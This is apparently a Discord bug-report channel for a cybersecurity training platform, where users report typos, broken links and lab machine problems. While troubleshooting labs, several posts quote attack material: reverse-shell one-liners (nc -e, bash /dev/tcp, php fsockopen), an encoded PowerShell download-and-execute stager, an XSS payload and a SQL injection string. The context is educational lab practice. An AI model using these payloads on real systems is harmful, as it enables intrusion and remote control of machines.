#room-bugs
1 messages Β· Page 22 of 1
https://tryhackme.com/room/vulnversity
room stuck !
yes it stucks
https://tryhackme.com/room/uploadvuln showing 503 response error
That would be because the room code is uploadvulns, not uploadvuln
Room: https://tryhackme.com/room/tonythetiger
Task 6
Recommended room (https://tryhackme.com/room/zthlinux) is private and the link to the person returns 404
Is replaced by Linux Fundamentals Part 1 till part 3
Might be true but the URL is still in the room
Thanks, updating (:
Gave +1 Rep to @soft terrace
Room: https://tryhackme.com/room/linuxfundamentalspart1
In the new linuxfundamentalspart1, 2 and 3 the videos are private
new linuxfundamentals3 - text about crontab say"0 *12 * * * cp -R /home/cmnatic/Documents /var/backups/"- I am pretty sure that should be */12
also the last cron related question in Task6 (still linux fundamentals 3) say "How frequently does this crontab run" - I guess that should be "cronjob" and not "crontab"
ZTH: Obscure Web Vulns: Task 16 - grammar mistake
I think it's supposed to be "The interesting thing is"
https://tryhackme.com/room/linuxfundamentalspart1 - Video is private
Direct YouTube Link: https://www.youtube.com/watch?v=kPylihJRG70
https://tryhackme.com/room/linuxfundamentalspart2 - Video is private
Direct YouTube Link: https://www.youtube.com/watch?v=7Zt2Mp2IeBI
https://tryhackme.com/room/linuxfundamentalspart3 - Video is private
Direct YouTube Link: https://www.youtube.com/watch?v=bwgaZCb2ft8
https://tryhackme.com/room/linuxfundamentalspart1
Task 7 I recommend you add something that explains how the & operator is actually used- not being that familiar with it myself I had to experiment to see how you actually use it. A beginner wouldn't know that you're supposed to but it at the end of a command, like my first instinct was to "& command text"
Thanks -- will update after some lunch (:
Gave +1 Rep to @lime yarrow
Good find. Will take a look ty (:
In Linux Fundamentals Part 3 Task 7 you cant try downloading and installing sublime text because no ROOT access on this task
Well NGL that's a weird answer format
It was already discussed in #room-help and #room-hints
The task is there an example and it doesn't expect you to install software onto a machine
Re-wrote the question to make this better -- thanks for letting us know!
Gave +1 Rep to @small forge
Not needed
There seems to be a bug with the WebOSINT room - the republicofkoffee.com domain no longer has its country listed as Panama - instead it is Iceland. The privacy protection service seems to have changed.
Hey guys, is anyone else having issues with VMs? I have asked another friends to try the same room and he is also having issues loading VULNERSITY
It was working for my 8 hours ago before bed, but this aFternoon i cant connect with either the attackbox nor my own Kali VM
as in the tryhackme.com page, or webservers on VMs in rooms? @terse stump
Ive been having issues which another friend said he was replicating, but the connection is slowly getting better it seems
Canβt understand it. Sometimes it just loads forever, other times it connects, yet a port scan and gobuster scan both work.
And maybe the room is updated since the video was posted, but the method which is described for using intruder does not give a positive for phtml extension to work, doing so manually on the site does give the confirmation, however. Quite frustrating.
is the metasploit room working properly
i am not able to gain access to the machine even after doing the exact commands
#room-help would be better
in linux fundamentals in task two in line 15 you write: SSH allows us to remotely execute commands on another device remotely. I think one of the remotelys can go. really nitpicky, but hey
@dusky junco ^
Trying to do the linux fundamentals rooms, just released, when i click start machine the in browser session did'nt appear.
and no credentials are provided to ssh in
that first machine should boot up where the attackbox would usually be, no ssh needed
Yeah, some people are just getting a blank screen there though
Didn't appear at all?
nope
Along the top of the room, near the title, is there a "show split screen" button?
Above that
Near the room title
Around there
CMN, I looooove this formatting with the callouts like that
oh derp
Nah, it's a weird thing
I didnt see that button
If you minimise a VM, it keeps that state
It's weird and annoying and I'd class it as a UX/usability bug
Have made sure staff are aware
Gave +1 Rep to @eternal summit
Task 2 cc @dusky junco
This should be plural, not possessive. No apostrophe.
Fixed. Thank you for reporting. π
Gave +1 Rep to @jolly kelp
tyty nice catch
Working through it with pedantic eyes RN for you
π it made quite a few rounds of eyes but yeah -- can never have too many so I appreciate it
good call (:
You can't navigate into the file
You can navigate into the directory, which would make more sense
I see
Also probably missing a step to go back home after that question
because the next task assumes you're in ~
I'd also add just a quick sentence about how grep is a lot more powerful and is designed around regular expressions
@dusky junco Also highlighted below are the "passwd" and "shadow" files. These two files are special for Linux as they show how your system stores the passwords for each user in encrypted formatting called sha512. Sha512crypt is different and that difference is really important IMO.
I'd ditch the word encrypted and say hashed.
Common Directories (task 6), etc section
/tmp I think it'd be nice to get the word volatile in there somewhere if you're going to compare it to RAM
Linux Fundamentals 3, Task 4, you start talking about Wget then change topic, then later swap back. It'd make sense for them to be all together
Task 5
Would make sense to say how we send those signals with kill?
Also task 5, is it just me or does the font size change randomly?
It's the ^Z, the T is just part of the output
Task 6 - Should probably mention system crontab vs each users individual crontab. Sometimes important for privesc etc.
@dusky junco I'm so sorry
I hope this hasn't been reported 1000 times, I searched and didn't find. Linux Fundamentals part 2 Task 5
"important" file is accessible by tryhackme user when I think only intended for after su'ing to user2
Thanks. VM is cloning π
Gave +1 Rep to @fast plank
In the room "MAL: Researching" on Task 4:
I get the same error still, any workaround for it?
hi so i was doing the osqueryi room and executed everything in order but it errored out!
Hi. Sorry about this. I'll look to getting a new sample submitted today and replaced within the room π
Linux Fundamentals 2, should the important file be world readable?
Room: https://tryhackme.com/room/rppsempire
Task 8
picture is not displayed
also in task 8. Should be WinPEAS and not WinPEASS
Fixed. Thank you for reporting. π
Gave +1 Rep to @soft terrace
Hi admin. Finished https://tryhackme.com/room/linuxfundamentalspart1 today. Task 7: Now if I wanted to add "tryhackme" to this file named "passwords" but also keep "passwords123", what would my command be
echo tryhackme >> passwords is correct.
echo tryhackme >> passwords123 is also correct.
Pls verify the bug. Thank you π
Answers have some tolerances, THM will accept it I guess. but echo tryhackme >> passwords123 is not correct answer.
Noted. The wrong answer was my initial answer. System indicated it was "correct". So I reset the room and keyed "echo tryhackme >> passwords".
There's a bug in Osquery > Task 5 Creating queries.
The question asks What is the query to show the username field from the users table where the username is 3 characters long and ends with 'en'?
SELECT username FROM users WHERE username like '%en';
My code above went through, but it didn't take into account that the username needs to also be 3 characters long.
My code marked as correct would only satisfy the username as long as it ends with 'en'.
Also, nowhere in the Osquery documentation did it contain any hints/tips on what syntax to use. I had to get help from the #room-hints channel to figure it out. It would've been best to suggest going to w3schools.com or something similar. The Osquery documentation assumes you are already versed with SQL (which I wasn't), which made it a useless resource.
This is due to answer variance. Not a bug. π
Solved and answered in the #site-bugs channel π
more of an update than a bug: on Kenobi, task 3 question 2, there's 4 now as of two days ago π
please can somebody help ?
that might be a #room-help question?
oh ok i asked it here because it was erroring out everytime so i thought it was a big in the room itself
Hello, I am doing the "MAL: Malware Introductory" room. For task 7, check MD5 hashes on vlc, aws and netlogo, there are no hashes. I pasted and installed on the VM the 6.0.0.34 version of hashtab, it works now. There is a problem with the installed version.
Overpass3 -Can't upload Β―_(γ)_/Β―
I'm in the right directory. Restarted the machine. No success. Tried from attack box. No success..
Not a bug. Try somewhere slightly different.
dammit lol.. Will try, thanks π
Gave +1 Rep to @eternal summit
Thanks will get this updated this weekend
Gave +1 Rep to @low marsh
Broken Link
Location URL: https://tryhackme.com/room/owasptop10
Task: Task 2 - Accessing Machines
Issue: The word "here" found in (Follow the guide here to connect using OpenVPN.) sends you to https://tryhackme.com/404
anyone knows why i can't access the machine for Linux fundamental part 1
Thank you and bless 
Gave +1 Rep to @dusky junco
Gd day, anyone having issues entering metasploit room? i can't access it. page forever loading
Hi, I was having the same issue but realized that when you click setting in file hashes it lets you select hash type. Click the box and the hashes should appear. Hope this helps.
I'm swapping out the VM to get this auto-selected right now (: thanks for helping out cc @static holly
Gave +1 Rep to @crimson maple
Tried that, didn't work for me. When I clicked the small box, the dropdown didn't show me anything
If I found a typo in one of the roms, is this the place to post?
yess please (:
In the "Linux Modules" room, under sed. There is a "be" missing. "to BE executed"
Could you share the URL to the room please? I'll update this now if so π
Awesome ty
I think one line below also there's a "the" missing..
Updated both: To add a script/command that needs to be executed with the / the string pattern
Thanks for reporting @obtuse musk
Gave +1 Rep to @obtuse musk
In the Linux Modules room under "sed", second question, there's a "the" missing right before "3rd and 4th".
https://tryhackme.com/room/linuxmodules
You are trying to solve task 5 Vulnerable Startup: Broken Authentication 2 inside task 4 Vulnerable Startup: Broken Authentication. The challenge title on your screenshot says Broken Authentication, but it should say Broken Authentication 2. I tested the challenge again on THM and can confirm that it works. The design of it might have been confusing or weird, and I will take that into consideration for any future rooms
Doing Eternal Blue and I found some ... bugs
if we can call them that
RHOST not RHOSTS
Oh nvm
Problem was with the exploit/windows ... It's windows 7, not 8
server is run on windows 7
Also, next task shows us how to upgrade from Shell to Meterpreter, but I got a Meterpreter shell directly
Thanks for the feedback! I'll try again and pay more attention to the title.
Gave +1 Rep to @sterile crater
did anyone else lose their progress in the linux fundamentals room?
Pretty sure it tells you to get a command shell first, for that reason
(It certainly should: I edited it a few months ago)
MSF made Meterpreter the default for it a while back
The rooms got reworked to be more beginner friendly.
See: #announcements message
good2know! thanks mate π
Gave +1 Rep to @soft terrace
Not really a bug, but just an error I spotted in Task 3 of John The Ripper room
in Linux Fundamentals1 when i press "Start Machine it start browser machine that gets connection error so i cant do anything in the box
Not really a "Bug" but I found a typo in a beginner room that could cause some confusion to beginners like myself.
Found another typo john the ripper room task 6
https://tryhackme.com/room/johntheripper0
etchashes.txt is the download file for this task.
"python hash-identifier.py" should be "python hash-id.py" as per the wget command above it.
Don't know if would be classified as a bug or not
But the Windows machine in room Blue Teaming The Grinch strikes again! is supppppper slow
I am using RDP via Windows, I have selected the closest VPN server, disabled all the graphic enhancement options when connecting via Windows RDP
and it's been 15+ minutes but the machine is responding very very very slow.
Half of the time I get a blank screen.
Is it normal, or it should'nt happen like this?
facing this issue only for Windows machine, linux boxes works like a charm.
I also got a Windows update pop-up.
Hello, I'm on the Nmap room Task 12 NSE Scripts Searching for Scripts. And I'm stuck on the second question. It seems like there's supposed to be a script it gets linked to, but I don't see a script it should be referencing.
Fixed.Thank you for reporting. π
Which one is correct?
@stark torrent is correct hash-id.py
Fixed. π
@glad badger Did you see the other one I mentioned in the same room?
Nevermind, I needed to read through the script from the first question. Missed the context there.
Fixed too. π₯³
Room: https://tryhackme.com/room/adventofcyber2
Task 10
Error: clicking on "intercepting a request" leads to https://extratechtalk.in/intercept-http-requests-using-burp-suite/ which can't be found anymore
Better try Haiti instead of abandoned hash-id or hash-identifier https://noraj.github.io/haiti/#/why
Better try NameThatHash
And understand the fundamental flaws with automated hash identification tools
yeah there are more emoji in the Readme π
I was having a look over some of the old rooms and noticed that the https://tryhackme.com/room/kali room has steps that tell you about using the machine in your browser, but they refer to an "Access in browser" button in the "Active Machine information" panel, whereas now you need to use the "Show Split view" button at the top of the page, that is next to help and options.
Woah that's an ancient room
819 days, yup, dunno if anyone uses it anymore, but it's shown me https://tryhackme.com/my-machine which i din't know about, so that's a plus
might be worth a revamp π
Certainly should be private now
Room: https://tryhackme.com/room/blaster
Task 4
Windows Defender catches the powershell script
...the powershell script?
you run the exploit, it gives you a command to type on the target machine's command prompt
something like this: powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAA...
That's... Probably not the intended exploit
At least, you certainly don't need that.
I would certainly not class this as a bug.
If you're getting picked up by defender, you're doing it wrong.
urgh can't paste pictures
ok so, I followed the instructions pretty closely and got picked up by defender
I did it once more following the tutorial video, still got picked up by defender
I used multi/script/web_delivery
set the target to PSH
set the payload to windows/meterpreter/reverse_http
set the LPORT to 443
set LHOST and SRVHOST to my IP
then run -j
got the command and just copy-pasted it into the elevated command prompt; nothing happens, the window just disappears
tried again without the -w hidden, and I got
IEX : At line:1 char:1
- If($PSVersionTable.PSVersion.Major -ge 3){ $GPF=[ref].Assembly.GetT ...
-
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:282
- ... edentials;};IEX ((new-object Net.WebClient).DownloadString('http://10 ...
-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~- CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
- FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
At line:1 char:1
- function m54v {
-
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
Hi guys, want to report a possible bug for https://tryhackme.com/room/linuxfundamentalspart3 .
The task is to find the IP address of the user who visited the site from the Apache access logs. However, the provided user itself do not have sufficient permissions to view the file. Not sure if my approach is wrong, but I will attach the screenshots below.
It seems I can't post images, so I have uploaded to imgur. https://imgur.com/a/0s9RxeL
it's not a bug, there's two log files
read the other one
and verify with the bot to be able to post screenshots in the future
!docs verify
Ok, I will try that out. Sorry for missing out the verification process =/ thanks!
no problem
Can someone please check, if there is a problem with "Daily Bugle", running sqlmap and never seen running it so slowly - practically doesn't even work. Two-three new lines in one hour. Also when clicking on anything the load times are enormously long. I know it's not a problem with my internet, as all other sites are running fast (on fibernet).
@twin tapir solly for ping but https://offsec.red/mimikatz-cheat-sheet/ this site in ur post exp room doesnt work (postexp room)
task 8
can anyone help me in room roysrus im unable to open webserver on port1234
i can open other server on port 80
try some other port like 8080
Hi ! I think we identified a bug in "Blaster" room. When following the steps in the last task, executing a powershell payload generated by MSF for a meterpreter, our shell is killed by Defender (which I understood is supposed to be deactivated).
Hello, in the Content Security Policy room, in task 7, the first attack, I tried several payloads that should be working, but when I receive the request in my webhook, the cookies are not showing. I even tried the payload from the writeup (which was similar to mine), and still not working. Does someone know the cause for this problem?
In the newest room (Linux server forensics) on task 2 and 4 the text isn't "wrapped" in the "viewing area". The text is not fully visible basically, I don't know if it is like that on any other tasks as I've only done up to task 4
Upload Vulnerabilities, Task 6, Extension Validation paragraph: "so actually don't mean much" <-- incorrect grammar
Should be "so it actually doesn't mean much"
Hello! Does anyone know why in the DVWA room, in the Command Injection vulnerability, even on Security Level Low, it won't spawn a reverse shell with 127.0.0.1 && nc -e /bin/sh <IP> <port>? I have already tried with nc -e /bin/bash, and I have tried changing the && to ; and |, but nothing works. All the examples I saw from DVWA spawned the reverse shell in a similar way.
@jolly kelp I would say that with the plural extensions and the use of "they" (plural) to refer to them before, "don't" makes most sense there. Neither of them really feel right though
It's saying that the file extensions don't mean much, rather than the whole topic doesn't mean much -- albeit amounting to the same thing
Netcat with the -e option very very rarely works
The -e option is specific to one version of netcat, and there's several
Huuum
How do you recommend to proceed? As I said, all the writeups I found use nc -e
Are they writeups for the THM room?
It won't be a bug with the room.
Try different reverse shell payloads.
seems to just be Task 2 and the start of Task 4 that has this text wrapping issue
Anyone else having a problem loading into the Vulnversity room?
Seems to be more of a site bug than a room bug. Try clearing cache and force-reloading
So I did the clear cache and reload but still stuck on loading
Yeah, I'm not sure what else to try or what's causing it. I think it's a known issue, but I don't know the cause or a fix. Sorry :/
Donβt worry about it but thanks for trying to help me π
Hello, just thought I'd let you know that the attackbox isn't able to complete Task 3, Enumerating SMB in the Network Services room on the complete beginner path. When running enum4linux on the attackbox targeting the target system, it throws errors that sound like missing dependencies. When using the web based kali machine instead everything works as expected.
if you are on windows sometimes the rooms dosen t work ( infinite loading )
you can do it from linux
i m using as main windows and whrn i met this bug i go in linux and see thr room there
Room: https://tryhackme.com/room/linuxserverforensics
Task 2
Error: Sentences are not properly displayed
https://tryhackme.com/room/linuxserverforensics - Task 4 - Most of the intro text is cut off -
Are you using Chrome? @soft terrace
Firefox
Interesting. It cuts off in Chrome as well. It displays fine in Safari, but still strange word-splitting.
I'm using Chrome
Shouldn't those be some form of standard text element for every room to maintain a consistent style?
The difference in boldness should probably also be a concern :p
to be exact
Is anyone else having issues with the Rust room? I havenβt been able to load it for over a month
Just sits there with the little circle spinning and never loads anything like the questions etc..
it's a known issue unfortunately
I don't know if there's a known fix
@eternal summit or @green steppe might know?
Hi it's a site issue
@amber flint site broke plz fix
Get help
love your answer lmao
brb calling papa ashu /s
name a better duo than rust and breaking things
Cry and Spooky
Machine in Linux Fundamentals Part 1 (https://tryhackme.com/room/linuxfundamentalspart1) not starting
Disk Analysis & Autopsy
(https://tryhackme.com/room/autopsy2ze0) not strating
anyone else getting error 504 - gateway timeouts when trying to start machines ?
yeah currently under investigation - #site-support message
π
Not a linux master but are the underlined in Red suppose to be 'x' instead of 's'?
well, it's talking about suid so I don't think so
ok I get it thank you π
Gave +1 Rep to @oak mica
Room: https://tryhackme.com/room/beginnerpathintro
Task: 2
Issue: Typo in the right side web page for "Target Hack", 2nd page: (to monitor stores' temperates) should be temperatures
On the 3rd page, "Targets" should be possessive ("Target's")
for some reason i cannot open the module in the cyborg room, it shows i have 0% completed the room but the checks marks in the task are green and i cannot see any content on tast 2
i ve tried to open the room with other browsers the result stays the same, and this problem only occurs with my acc
the button is non-responsive for this room, clicking yes please doesn't do anything
oh, does indeed sound like a bug then
maybe but it did occur with my acc only, i've asked so many people who did or didn't do this room, but everything seems fine for them
yeah it loads fine for me, still a bug I guess
hmm
i got some issues with the juice-shop.herokuapp.com site. I can't make a ping and becouse that is imposible the burn suite work.
the "learn rust' room is not working ,please solve this issue
That's not TryHackMe.
Pings are also independent of the web application
MImikatz part (Task 21) in the wreath room https://tryhackme.com/room/wreath
Does this mean the network has to be reset?
Hello, the Rust root is in infinite loading (https://tryhackme.com/room/rust)
does anyone manage to access it?
same
+1
Should be working now. π
Serving Files From Your Host - WEB
Ubuntu machines come pre-packaged with python3. Python helpfully provides a lightweight and easy-to-use module called "HTTPServer". This module turns your computer into a quick and easy web server that you can use to serve your own files, where they can then be downloaded by another computing using commands such as curl and wget.
typo on last line should read 'computer'
Room: linux fundamentals 3
mod mentioned that it is correct
No
Reporting it in #848213138565365760 would have also been fine
But cc @dusky junco ^^
Not a bug but feedback regarding
Room: https://tryhackme.com/room/linuxfundamentalspart3
Task 6
Many people are confused with the frequency question of the crontab.
Could you add a @ in the answer format so it's more clear how the answer should look like?
Thatβs not possible
I am at linux fundamentals P1 room, and i am getting connection error while starting the provided attackbox in that room.....
- it's not the attackbox, it's a different machine
- it's a known issue atm
Ok
So, is there any workarounds?
And sorry, i am new at tryhackme π
You'll need to wait for it to be fixed
K
attacktive directory room, not really working when trying to install kerbrute, the standard attack machine seemed better than the kali one, but still terminal crashes and resets to being brand new like when you start the instance up
im doing Brainstorm room. but i have an issue with running charserver.exe on my windows vm with imunitty debugger and mona. its a 16bit executable and ntvdm.exe seems to bug so i cant run the chatserver.exe. i didnt find any working fixes. maybe anyone here has a clue
yes thanks
Gave +1 Rep to @glad badger
thx ill check that out
Gave +1 Rep to @eternal summit
jep it runs now thx a lot
Gave +1 Rep to @eternal summit
just seems like incorrect grammar; room https://tryhackme.com/room/nax
Fixed, thank you for reporting π
Gave +1 Rep to @drowsy portal
Room : common linux privesc
task 4
everytime i click this button. it say "undefined" and my anti virus detects a RCE attempt
Yeah. It's a false positive with BitDefender.
It's crazy it detects it as RCE too, because windows doesn't have /etc/passwd
It's not normal. It's BitDefender being bad at its job.
I may be crazy or not understanding. I am doing Vulnversity, and no matter any attackbox i open, when scanning, squidproxy is never there or running. nor is the webserver on 3333 there. so i cannot move onto task3.
!docs verify
Follow those steps, and post a screenshot of what you're doing in #room-help
Sorry for the late reply. i will do that now
I ran into an issue with steelmountain room for a while. sc in powershell was triggering set-content and not service-control as the room suggested. Thankfully I noticed that files were being created and was able to complete the room by using service-control.
room https://tryhackme.com/room/catpictures it's pinging just fine but i can't access anything
ftp, or the webserver
Might also want to ask in #850434990978105384
got the webserver working, after i leave the room xD..
Hi, Seems there is a typo in the room https://tryhackme.com/room/introtox8664, for the task 4, it mentions aaa while AFAIU it should be aa. (There is also an "empty" command to be run)
Hi π
in https://tryhackme.com/room/malstrings the actual amount of total transactions doesn't match anymore. The total amount seems to still going up.. The right answer for the 1st question in task 4 is one below the actual one on this site: https://live.blockcypher.com/btc/address/13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94/
Another little typo in Task 5: The next instruction is a jle which is going to check is the value is var-ch is less than or equal to 8. should probably be The next instruction is a jle which is going to check if the value of var-ch is less than or equal to 8.
Hi thank you ((: I'll get this updated and archive it to prevent it in the future
Gave +1 Rep to @obtuse musk
I'm doing the filter evasion section of the Cross-site scripting room, and challenge 3 doesn't seem to take my answer as correct even though it is.
<img src="blah", onerror=alert("H"+"e"+"l"+"l"+"o") / >
I tried the solution from the writeup, which does work, but is not the same way I did it. Not sure if I was too impatient to get the answer popup, but yeah.
TechIT room is always stooping my rev shell is not receiving data from the room
Is that a public room?
Game Zone room server crashes when you do the manual SQL injection
with ' or 1=1 -- -
and it doesnt boot back up, so you have to terminate and reboot it
seems to work on attackbox, so I wonder whats up with my WSL Kali now
I did some other boxes previously and in one walkthrough entered some ufw command that I was not even sure what it did to help me advance, since then I've removed ufw from my system
but I cant seem to access shit now
ifconfig shows many tun interfaces, more than there was previously
like 4, zero through 3
#site-support would be better as this isn't a bug with the room
gotcha
found the issue, I had 2 openvpn processes running, oops
Hi i think the authenticate room has some errors with the json web token exploitation. i have been trying to follow the walkthrough for the past hour and the only token that works is the one provided for admin, if you try and get user2 it keeps giving an error
Room: https://www.tryhackme.com/room/xss
Task 9
Image is not properly displayed
https://tryhackme.com/room/networkservices
telnet is not running any command (ping)
.RUN ping ... is now showing anything, server hangs without any further message
I've added it to the list. π
In the Powershell Scripting room, the first question asks for the location of "interesting-file.txt", when the file name on the machine is interesting-file.txt.txt
fair warning, the same will happen for different files throughout the room, be on the lookout
good to know, just spent like 20 minutes trying to figure out what was wrong with my syntax because I was using the full name of the file, until I just decided to *.txt
same here π
In the Mal: Strings room task 4, the # of the btc transactions has gone up by one
Resolved, thanks for reporting (:
Gave +1 Rep to @next hare
No prob bro beans thanks for the room
Much appreciated 
Room: https://tryhackme.com/room/thatstheticket
Bug: Typo
Sentence: "We not not recognise that email"
@tepid moon thought it'd be best to ping you.
A Not Not is like an At-At from The Empire Strikes Back. π

well this is fun, I am not allowed to login as admin in Corp, I have tried both "runas" and RDP, runas tells me there are some issues with the admin user and running RDP tells me to change the password.. but after chainging the password it crashes on me...
Didn't crash on me last time I changed the password. The password's expired which is the issue
Yup, I reset the box and it didn't crash after I changed the password.
The SMB server on the Attactive Directory seems to be malfunctioning
You should not have four forward slashes?
It's either //ip//share or \\\\ip\\share when you're on Linux
I think this is a problem with the task question itself. I tried verifying it with my browser by sending a get request and the server responded same what nessus reported
hi, I'm not sure if this is the right place to request support, but I am having an issue with connecting to a windows machine using xfreerdp. [12:37:15:630] [1955:1956] [INFO][com.freerdp.client.common] - Network disconnect!
I've restarted the machine, and it still gives me the same issue.
My bad, I always have those confused
https://tryhackme.com/room/torforbeginners <danielas3rtn54uwmofdo3x2bsdifr47huasnmbgqzfrec5ubupvtpid.onion> should be https:// and not http:/: as stated in the description
http timeout while https works
http works as well. If it times out, change the circuit a few times. π
ok so np
Just some feedback - In the XSS section of the top 10 OWASP room, and the XSS room itself, the XSS playground website on the machine you deploy is agonizingly slow. It seems to get stuck trying access jquery and some stuff on cloudflare when it presumably doesn't have internet access, just hangs for up to a minute whenever you change pages. Same issue in the machine for Task 7 (Broken Authentication), it hangs on "Looking up maxcdn.bootstrapcdn.com" for up to a minute with every click on the website
You're trying to sign in with a microsoft account
Set the username to .\wade, not MicrosoftAccount\wade
Let me try this
Not working
Same error
Try doing it inside Kali?
xfreerdp /v:10.10.183.0 /u:wade /p:PUT_THE_PASSWORD_HERE /dynamic-resolution +clipboard /cert:ignore
Obviously subbing in the correct password
Trying again
I think ignoring the cert worked.
That'd help. Did that work?
Thank You!!!
Gave +1 Rep to @obsidian kiln
Np π
In the room https://tryhackme.com/room/dllhijacking, task 1, i think it is 'print spooler'
Hi/ there. For the "rpmetasploit" room, the first Q&A option in task 7 no longer seems to valid.
Fixed. Thank you for reporting. π
Gave +1 Rep to @strong kelp
The first sentence in https://tryhackme.com/room/rppsempire does not make much sense.
I think it should be 'Starkiller uses a listener and a stager to create an agent. The listener does exactly as it sounds like ...'
RDP doesn't seem to work in https://tryhackme.com/room/postexploit. Other rooms work fine, and SSH works. Resetting had no effect.
@sleek jay https://tryhackme.com/room/tmuxremux
it lack the word more (task 2)
This is @tardy lynx room.
Thank you!
You helped him?
oh π actually found it from here https://tryhackme.com/p/0day
π
in the created room tab
Yeah it says Iβm a collaborator
impostor π
I'm sure it was probably reported (especially looking at the room grade), but due to a few problems https://tryhackme.com/room/bof1 is quite painful: I used it as a starter for buffer overflows (after landing in the https://tryhackme.com/room/bufferoverflowprep via the Offensive pentesting path) as it's advertised, and as it's rated easy. A clear example is the fact the shellcode is not suitable for this room (or did I miss something?) it's really a pain, having a working shell code, or at the very least a clear mention that this shellcode is not expected to work would help so much getting the basics. Hopefully https://l1ge.github.io/tryhackme_bof1/ was quite helpful to fix the missing bits and complete alone the last task, but without it this room seems quite difficult for newcomers to buffer overflows. Certainly not an easy one. It's a bit sad as it still contains interesting and fun content.
I believe that I might have found a room task that might be accepting a lowercase character when it should in reality only allow for an uppercase character. If that's the case, who should I contact to possibly rectify it?
THM answer fields allow for some tolerance, so it's not a bug per-se
In the room Ra, when trying to run spark, the spark program crashes everytime. Impossible to get past on my end.
Might be an issue with Java on the box, ill conduct more testing later and try replicating the issue.
In the Room Nax, the answer of Q8(Metasploit module name) is old. The name has changed.
Hello everyone, room regular expressions task 4 question 10 accepts only a wrong answer (.?\W+ instead of .?\S+) (sorry for the spoiler)
Tryhackme.com/room/catregex
Answer tolerance, not a bug
Was there a room for like typos, ?? I guess feedback room would have been better,
It's THM's answer tolerance. Refresh the page and it will go away.
Typos in rooms count as bugs.
hello
Hello
total 28 drwxr-x--- 4 www-data www-data 4096 Jun 3 2020 . drwxr-xr-x 3 root root 4096 May 18 2020 .. drwxr-x--- 2 www-data www-data 4096 May 21 2020 css -rw-r----- 1 www-data www-data 17 May 22 2020 drpepper.txt -rw-r----- 1 www-data www-data 1723 May 26 2020 evilshell.php -rw-r----- 1 www-data www-data 2200 May 21 2020 index.php drwxr-x--- 2 www-data www-data 4096 May 21 2020 js
what's the output for this cat evilshell.php
maybe it's your keyboard layout
copy my message
Hey guys, there is a problem with the room 'Fowsniff' (at least for me). According to the room, the root should be done editing 'cube.sh' and log again. The problem is editing it, in many ways, with different shells, doesnt work at all.
using netcat?
Whichever works
What type of payload are you putting in cube.sh?
And do you know where root is executing it?
yes
i know
i tryed python's and bash
i send you
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
then the normal one suggested in the room
try bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
Did you replace the IP with your own VPN?
Because I know it's not 10.0.0.1
i try, i log in again
yes, wpn works
also the shell works
if i do from the dir ./cube.sh
it works
the problem is that doesn't start if i log in, as should be
Not if you login, it's supposed to happen when root logs in.
ok
any reverse shell doesn't work, tried bash and nc
php -r '$sock=fsockopen("<IP>",9001);exec("/bin/sh -i <&3 >&3 2>&3");'
yeah it works
Ayee
thanks @sleek jay
Gave +1 Rep to @sleek jay
No problem
i can confirm everything is working fine, i just completed the room. just one thing simple bash reverse shell didn't work. needed to provide it as a argument in sh -c or bash -c . why is that @sleek jay
Room: https://tryhackme.com/room/linuxfundamentalspart3
Umm... >, >>.. These are not pipe operators... ???
IO redirection symbols maybe,
Redirection operators
i got the first question correct lmao , and the text above say that im wrong.
why answer tolerance exits in questions like this ???
The room creator has no control over it.
hello everyone i think there is a problem with room named internal
wordpress isn't loading completely
this is how it looks
the resources are in internal.thm which is in assessible
Guys anthem vm is not working, i waited 10 mins for it to boot up but it doesn't work? Any suggestions?
@night viper
Read the bit at the start. It's usually useful
And maybe don't try hard rooms if you're not familiar with vhosting
-ban @wheat fractal steam scambaiting
π¨ Banned Dα΄Κα΄#3867 indefinitely
where to report broken link ? http://tryhackme.com/room/networkservices
Oh my gorsh he banned dorkstork
Is there a bug in OWASP Top 10 reflected XSS machine?
on sending a payload with js code to display machine's ip address in an alert, no flag is displayed
having lots of problems in the room: Upload Vulnerabilities... most of the pages dont ever load.. i was only able to complete half the room.. the machine works.. but i have to keep reloading 20 times per page to work..
Sounds like a VPN issue
Make sure you have setup your VPN connection correctly https://tryhackme.com/room/openvpn
Type ps aux | grep openvpn into your terminal and press enter
If there's more than one line (that don't start with "grep" or sudo), do the following steps
Type sudo killall openvpn into your terminal and press enter
Start the VPN with sudo openvpn <path-to-config>
i'l look into it.. thanks for the reply.. im kinda new in this world
We all start somewhere :). Don't be afraid to ask questions, that's what this discord is for
Hi how you
how are you*?
I'm having issues with this room EasyCTF
I'm trying to execute an .py file but it gives me this error
that's a better question forr #room-help or #room-hints . This channel is for bugs in the rooms
ok I'll go there
Hey! My anti-virus is flagging the first Network Services room pretty heavily, is that normal?
Avast?
Yup!
Yeah, some AV will report issues with THM, as a lot of rooms involve malicious code in various ways. You can whitelist/allow the tryhackme.com domain if you want. You're taking a bit of a risk there, but none of the rooms on THM are designed to hurt you
That makes sense. Appreciate the help!
Hey hi, I've somehow managed to achieve NaN time left on the AttackBox. Just send me a DM if you like to know the IP on the machine in question.
bug in burp suite, correct answer check skips last letter in the string
title is owasp juice shop
task 7 question 6
Answer tolerance, not a bug. Refresh the page.
https://tryhackme.com/room/kenobi
ProFTPd things near last question, mounting doesnt show up anything, double checked the steps (copying, mounting) but still can't find the rsa key
Not a bug, user error
Are you on the attack box or the machine they asked you two spin up?
They are separate vms
attack box
You'll have to spawn the vm and ssh into it
Be nice, it's an honest mistake fluff π
before i even learn how to do that?π©
Fundamentals 1 spawns in split view
how to ssh into a vm nd wot u said
Im dumb
Ill be honest
I don't know anything thas y im tryna learn
Dont worry, lemme go to the room
Thanks g
@astral quartz Power down attack box, revisit the room after it's down. Click the "Start Machine" button in Task 3 of the room
This will spawn a correct machine to finish the tasks
Thanx g
I am nice! 
Hi, now im doing Linux Fundamentals Part 1
and i cant run the machine. Any one help?
!docs verify
Another Czech nice
Im not clicking on that link π
